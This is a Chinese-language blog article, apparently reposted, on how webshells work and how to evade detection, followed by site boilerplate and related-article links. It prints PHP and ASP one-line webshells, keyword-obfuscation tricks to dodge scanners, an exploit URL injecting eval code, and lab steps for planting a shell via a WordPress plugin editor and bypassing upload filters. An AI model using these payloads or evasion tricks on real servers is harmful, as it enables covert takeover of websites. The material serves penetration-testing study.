Webshell 及检测绕过

这篇具有很好参考价值的文章主要介绍了Webshell 及检测绕过。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

webshell 概念
web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web服务器的管理权限,从而达到对网站服务器的渗透和控制。
 

从一个最简单的webshell结构可以看出其基本结构

“<?php eval($_POST[‘a’]);?>”

shell的实现需要两步:数据的传递、执行所传递的数据。

Webshell的分类

  • 根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)
  • 根据脚本名称分类:jsp、asp、aspx、php

数据传递&绕过检测

对于数据传递,我们通常的做法是使用$_GET、$_POST、$_SERVER、$_COOKIE等获取客户端数据。但这类关键词如果直接出现的话,那么可以很容易回溯到,我们有几种方案来解决这个问题:

  1. 利用应用本身所在框架的输入封装来得到传递的数据
  2. 采取某种变通的方式来绕过检测,譬如使用${"_G"."ET"}。不过这种方式也有自身的缺点,可以跟踪“${”;不过这种跟踪又可以通过“$/*a*/{”这种方式绕过(当然其又有被跟踪的可能性)。
  3. 使用其他数据获取方式来获取数据,譬如$_REQUEST、$GLOBALS[“_GET”]、$_FILE等。
  4. 人为构造语言缺陷或应用漏洞,并且这种缺陷是不易察觉的,譬如伪造管理员session等         

    使用方法
    直接上传一句话木马

    举例:grade网站

    找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话

    <%execute request(“value”)%>

    添加到asp数据库

    举例:攻防对抗 http://192.168.7.40/

    后台登录页面:http://192.168.7.40/wp-login.php

    admin:iloveyou登录后台,修改插件文件来插入shell

    然后菜刀链接:http://192.168.7.40/wp-admin/plugin-editor.php?plugin=hello.php

    找到如命令执行漏洞页面,打开客户端浏览器,填上加入了一句话的asp文件,

    举例:代码执行漏洞。

    Exp:/search.php?searchtype=5&tid=&area=phpinfo()
    
    /search.php?searchtype=5&tid=&area=eval($_POST[simple])

    构造一句话小马,使用菜刀连接                                                                                                 

    WebShell攻击的原理

    WebShell是黑客经常使用的一种恶意脚本,原理就是利用Web服务器自身的环境运行的恶意代码。从名字来看Web指的是网页服务,Shell指的是计算机程序运行的指令命令。这也揭示了WebShell的攻击方法,就是通过WebShell脚本的上传,利用网页服务程序实现操控服务器的一种方式。以PHP语言为例,只需要编写一个简单的PHP代码文件,上传到网站目录中,就可以对网站服务器进行操控,包括读取数据库、删除文件、修改主页等都可以做到。这么一个简单的语句就可以为黑客入侵打开一扇大门,让黑客可以随意地执行任意代码

    Webshell上传绕过方法
    (一)绕过前台脚本检测扩展名上传Webshell
    当用户在客户端上传文件的时候,客户端与服务器没有进行任何的信息交互,判断上传文件的类型是前台脚本文件来判断。

    白名单方式检测:允许jpg,png等文件上传,如果要上传php格式文件,可以后面加一个.jpg后缀,提交后用burp进行抓包拦截,把jpg后缀删除。

    举例:

    http://127.0.0.1/upload-labs/Pass-01/ burp

    改后缀
     文章来源地址https://www.toymoban.com/news/detail-654029.html

到了这里,关于Webshell 及检测绕过的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 常见的webshell的流量特征和检测思路

    一、webshell概述      Webshell客户端是一种连接Webshell后门,用于攻击者与服务器之间通信的程序。 二、Webshell流量监测思路 1、特征分析:分析流量特征中的关键特征,判断是否存在webshell流量特征; 2、请求模式:分析webshell流量的请求模式,可以通过分析URL,参数和头部信

    2024年02月09日
    浏览(32)
  • 小研究 - 面向 Java 的高对抗内存型 Webshell 检测技术(五)

    由于 Web 应用程序的复杂性和重要性, 导致其成为网络攻击的主要目标之一。攻击者在入侵一个网站后, 通常会植入一个 Webshell, 来持久化控制网站。但随着攻防双方的博弈, 各种检测技术、终端安全产品被广泛应用, 使得传统的以文件形式驻留的 Webshell 越来越容易被检测到, 内

    2024年02月16日
    浏览(44)
  • Webshell 网络安全应急响应

    webshell通常指JSP、ASP、PHP等网页脚本文件形式存在的一种服务器可执行文件,是一种网页后门,攻击者入侵后,通常将后门文件网站服务器Web目录下正常的网页文件混在一起,使用浏览器或专用客户端进行连接得到了服务器操作环境,达到控制网站的目的。 常见的webshell脚本

    2024年02月12日
    浏览(44)
  • 网络安全——Webshell管理工具

    一、什么是Webshell    二、中国菜刀的使用 从靶机(IP:192.168.30.35)的DVWA网站上传文件, 1、菜刀的界面 2、新建一个“一句话木马文件”,名字为phpma.php 3、登录靶机的DVWA网站,调成Low级别,并到File Upload关卡,上传刚刚创建好的phpma.php文件, 注:要把路径记住     3、在菜

    2024年02月02日
    浏览(45)
  • 过检大马下载webshell,360,安全狗。。。

    上传利器phpwebshell  提权 关注我获取更多资源 ?php   $password = \\\"68xi\\\";//设置密码   error_reporting(E_ERROR); header(\\\"content-Type: text/html; charset=gb2312\\\"); set_time_limit(0);   function Root_GP($array) {     while(list($key,$var) = each($array))     {         if((strtoupper($key) != $key || \\\'\\\'.intval($key) == \\\"$key\\\") $

    2023年04月24日
    浏览(38)
  • 免费简单好用的 webshell 在线检测:支持 php、jsp、asp等多格式文件

    话不多说,直接上图上链接:https://rivers.chaitin.cn/?share=3d4f2e8aaec211eea5550242c0a8170c 还是比较好用的,支持 PHP、JSP 文件 webshell 检测,看官方解释文档,引擎使用静态文本特征、骨架哈希、静态语义分析、动态污点追踪、动态插桩内存等检测技术,听起来比较高级。 也提供 API 接

    2024年02月02日
    浏览(49)
  • selenium绕过检测,规避检测

    我们在使用Python Selenium进行自动化测试或爬虫时,有时会遇到被网站检测到并阻止的情况。这些网站通常会使用各种技术手段来检测和阻止自动化脚本,例如检测浏览器指纹、检查页面元素是否被自动化程序操作、检测用户行为模式等。本文将介绍一些常见的技术手段,以及

    2024年04月12日
    浏览(38)
  • [JAVA安全webshell]冰蝎jsp木马分析

    只是分享一下对冰蝎webshell分析的一个学习过程,冰蝎webshell使用了加载字节码的方式执行恶意代码。 首先打开webshell 这么一行实在不好看,先把他分行吧。 分完行之后,就很清晰明了了。 导入了三个依赖,一个是标准库,两个估计用于加密。 然后定义了一个类U,继承自

    2024年02月09日
    浏览(39)
  • 网络安全02--负载均衡下的webshell连接

    目录 一、环境准备 1.1ubentu虚拟机一台,docker环境,蚁剑 1.2环境压缩包(文件已上传资源): 二、开始复原 2.1上传ubentu: 2.2解压缩 2.3版本20没有docker-compose手动下载,包已上传资源 ​编辑 2.4问题:下载无法连接 2.5解决方法:ubentu上做代理,或xftp自己上传,我这里使用ub

    2024年02月19日
    浏览(36)
  • web安全第四天:webshell原理与菜刀使用

    1.1 WebShell的含义 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得

    2024年02月06日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包